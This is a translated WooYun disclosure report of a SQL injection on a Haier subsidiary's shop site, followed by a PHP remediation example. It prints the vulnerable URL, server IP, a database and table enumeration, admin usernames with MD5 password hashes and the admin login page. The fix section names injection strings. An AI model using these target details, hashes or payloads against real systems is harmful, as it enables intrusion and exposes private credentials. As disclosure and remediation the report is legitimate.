
Vulnerability summary

Defect ID: wooyun-2015-0136277

Title: SQL injection vulnerability on a Haier Group site

Vendor: Haier Group

Author: M4sk

Submitted: 2015-08-24 18:49

Fix time: 2015-08-29 18:50

Published: 2015-08-29 18:50

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-24: details sent to the vendor, awaiting vendor handling
2015-08-29: vendor proactively ignored the vulnerability; details disclosed to the public

Brief description:

As per the title.

Detailed description:

http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160 (site footer: ©2013 Qingdao Haier Strauss Water Equipment Co., Ltd. All rights reserved)

Target: 		http://www.hswzyj.com/shop/mobile/hdzqde.php?id=160
Host IP: 223.6.248.180
Powered-by: PHP/5.3.29
DB Server: MySQL >=5
Resp. Time(avg): 96 ms
Current User: haier@10.168.25.55:20635
Sql Version: 5.5.18.1-log
Current DB: shitelaoshi
System User: haier@10.168.25.55:20647
DB User: 'haier'@'%'
Databases: information_schema
           mysql
           performance_schema
           shitelaoshi
           stls_lt
           stls_shop
           watermaker


Database: shitelaoshi
Tables:
yanyu_address
yanyu_admin
yanyu_admin_panel
yanyu_admin_role
yanyu_admin_role_priv
yanyu_announce
yanyu_attachment
yanyu_attachment_index
yanyu_badword
yanyu_block
yanyu_block_history
yanyu_block_priv
yanyu_cache
yanyu_category
yanyu_category_priv
yanyu_collection_content
yanyu_collection_history
yanyu_collection_node
yanyu_collection_program
yanyu_comment
yanyu_comment_check
yanyu_comment_data_1
yanyu_comment_setting
yanyu_comment_table
yanyu_content_check
yanyu_copyfrom
yanyu_datacall
yanyu_dbsource
yanyu_download
yanyu_download_data
yanyu_downservers
yanyu_extend_setting
yanyu_favorite
yanyu_flashbanner
yanyu_flashbanner_data
yanyu_form_baoxiu
yanyu_form_huodong
yanyu_form_lianxi
yanyu_form_lipinjuan
yanyu_form_user_reg
yanyu_form_wenti
yanyu_goods
yanyu_goods_data
yanyu_hits
yanyu_ipbanned
yanyu_keylink
yanyu_keyword
yanyu_keyword_data
yanyu_link
yanyu_linkage
yanyu_log
yanyu_member
yanyu_member_detail
yanyu_member_group
yanyu_member_menu
yanyu_member_verify
yanyu_member_vip
yanyu_menu
yanyu_message
yanyu_message_data
yanyu_message_group
yanyu_model
yanyu_model_field
yanyu_module
yanyu_mood
yanyu_news
yanyu_news_data
yanyu_order_cart
yanyu_order_content
yanyu_order_logistics
yanyu_page
yanyu_pay_account
yanyu_pay_payment
yanyu_pay_spend
yanyu_picture
yanyu_picture_data
yanyu_position
yanyu_position_data
yanyu_poster
yanyu_poster_201401
yanyu_poster_201402
yanyu_poster_201407
yanyu_poster_201408
yanyu_poster_201412
yanyu_poster_201501
yanyu_poster_201502
yanyu_poster_201503
yanyu_poster_201504
yanyu_poster_201505
yanyu_poster_201506
yanyu_poster_201507
yanyu_poster_201508
yanyu_poster_space
yanyu_queue
yanyu_release_point
yanyu_search
yanyu_search_keyword
yanyu_session
yanyu_shop
yanyu_shop_data
yanyu_site
yanyu_sms_report
yanyu_special
yanyu_special_c_data
yanyu_special_content
yanyu_specifications
yanyu_specifications_data
yanyu_sphinx_counter
yanyu_sso_admin
yanyu_sso_applications
yanyu_sso_members
yanyu_sso_messagequeue
yanyu_sso_session
yanyu_sso_settings
yanyu_tag
yanyu_template_bak
yanyu_times
yanyu_type
yanyu_urlrule
yanyu_video
yanyu_video_data
yanyu_vote_data
yanyu_vote_option
yanyu_vote_subject
yanyu_wangdian
yanyu_wangdian_data
yanyu_wap
yanyu_wap_type


Database: shitelaoshi
Table: yanyu_admin
Total rows: 3
userid username password
1 yanyu 79c8727efc9a2f6796e2ce7ef6456a4d
2 admin 4cbb1240471931aaa9799313074ceafb
4 stls 2c648f7ba5cfa09c2e71fdf59e7ca481
http://www.hswzyj.com/shop/admin/privilege.php?act=login
Backend (admin) login address.
Since the MD5 hashes didn't crack, I didn't go any further.

Proof of vulnerability:

See above.

Fix:

You know how.
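The fix section leaves the remedy unstated. What follows is an added example, not code from the report or from the hswzyj.com site (the source of hdzqde.php is not shown anywhere on this page): it reconstructs the pattern that an injectable numeric `id` parameter implies and places a hardened handler beside it. The table and column names (`yanyu_news`, `title`, `content`), the mysqli connection and the PHP 7+ target are assumptions.

```php
<?php
// Added example (not the report's or the site's code). The real hdzqde.php
// source is not shown in the report; the table and column names below are
// assumed. Requires PHP 7+ with mysqli (mysqlnd for get_result()).

// Vulnerable pattern the finding implies: the raw query-string value is
// spliced into the SQL text, so "160 AND 1=1", "160 UNION SELECT ..." and
// similar payloads reach MySQL as SQL.
function find_item_vulnerable(mysqli $db, array $get)
{
    $id  = $get['id'] ?? '';
    $res = $db->query("SELECT id, title, content FROM yanyu_news WHERE id = " . $id);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened version: validate the type first, then bind the value as a
// parameter so it is never part of the SQL text.
function find_item_safe(mysqli $db, array $get)
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {          // "160 AND 1=1", "", "abc" all stop here
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT id, title, content FROM yanyu_news WHERE id = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);  // 'i': sent as an integer, never interpolated
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Minimal wiring (connection parameters are placeholders, not the site's):
// $db = new mysqli('127.0.0.1', 'shop_app', 'secret', 'shitelaoshi');
// header('Content-Type: application/json');
// echo json_encode(find_item_safe($db, $_GET));
```

Parameter binding keeps the value out of the SQL text, and the integer check rejects a payload before any query is built. Two further points follow from the dump itself: the application account `'haier'@'%'` could read every schema on the server, including `mysql`, from any host, so it should be restricted to the schema the shop needs and to the web server's address; and the `yanyu_admin` passwords are unsalted MD5, which is why the author's inability to crack them is the only thing standing between this injection and the admin panel. `password_hash()` (PHP 5.5+) is the replacement; the server's PHP 5.3.29 was already past end of life when the report was filed.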

Copyright notice: when reposting, please credit the source: M4sk@WooYun


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-08-29 18:50

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None